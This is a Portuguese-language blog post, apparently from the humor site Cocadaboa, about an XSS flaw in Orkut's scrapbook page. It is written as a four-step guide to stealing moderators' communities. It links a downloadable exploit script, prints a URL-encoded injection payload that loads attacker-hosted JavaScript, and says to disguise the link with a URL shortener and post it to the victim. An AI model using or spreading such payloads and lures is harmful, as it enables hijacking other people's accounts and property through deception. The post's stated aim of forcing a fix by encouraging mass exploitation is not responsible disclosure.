E já estava demorando pra aparecer um novo bug no orkut, desses que hora ou outra acaba com o sono dos moderadores das grandes comunidades.

A nova falha, descoberta por um hacker brazuca chamado Klay, parece ter sido encontrada no começo de Novembro mas só divulgada (ou vazada) publicamente ontem, dia 26.

A vulnerabilidade é novamente do tipo XSS, e neste caso foi achada na página responsável por visualizar e postar scraps: scrapbook.aspx

A diferença é que desta vez, programadores amigos do hacker criaram um script que automatiza totalmente o roubo, fazendo a transferência de todas as comunidades de um moderador para um profile determinado. Tudo numa paulada só e em menos de 1 segundo.

E como acreditamos que o bug só será sanado se sair do 'underground' e for amplamente explorado, o Cocadaboa ensina em 4 passos, como proceder pra você também fazer parte desta putaria:

1 - Baixe a exploit original: http://orkutexploits.90megs.com/exploit_xss_26-11-06.js
Este arquivo .js (javascript) deve ter apenas a primeira linha alterada, onde deve conter o UID do profile que irá receber as comunidadade por você sequestradas.

2 - Após alterá-lo, hospede o arquivo num freehosting qualquer e anote o endereço, que vai ser útil agora, no terceiro passo.

3 - Edite a linha do código abaixo, trocando o www.site.com/arquivo.js pelo endereço do servidor onde você hospedou o js, e o nome do js. Exemplo: www.geocities.com/hacker/bug.js

http://www.orkut.com/Scrapbook.aspx?na=%22%3B%7D%3B//--%3E%3C/script%3E%3Cscript%20src%3D%27http%3A//www.site.com/arquivo.js%27%3E%3C/script%3E%3C%21--

4 - Último passo: Pra mascarar este link pra lá de suspeito, crie um redirecionamento em um site como o tinyurl.com, e poste a url gerada, no scrapbook da vítima (moderador).

Se você fez tudo direitinho, quando moderador clicar no seu link, você vai automaticamente receber em sua Home todas as comunidade dele, prontas pra você aceitar a transferência e ser o novo dono!

Lembre-se de após o roubo, devolver as comunidades. ;)

Vinícius K-Max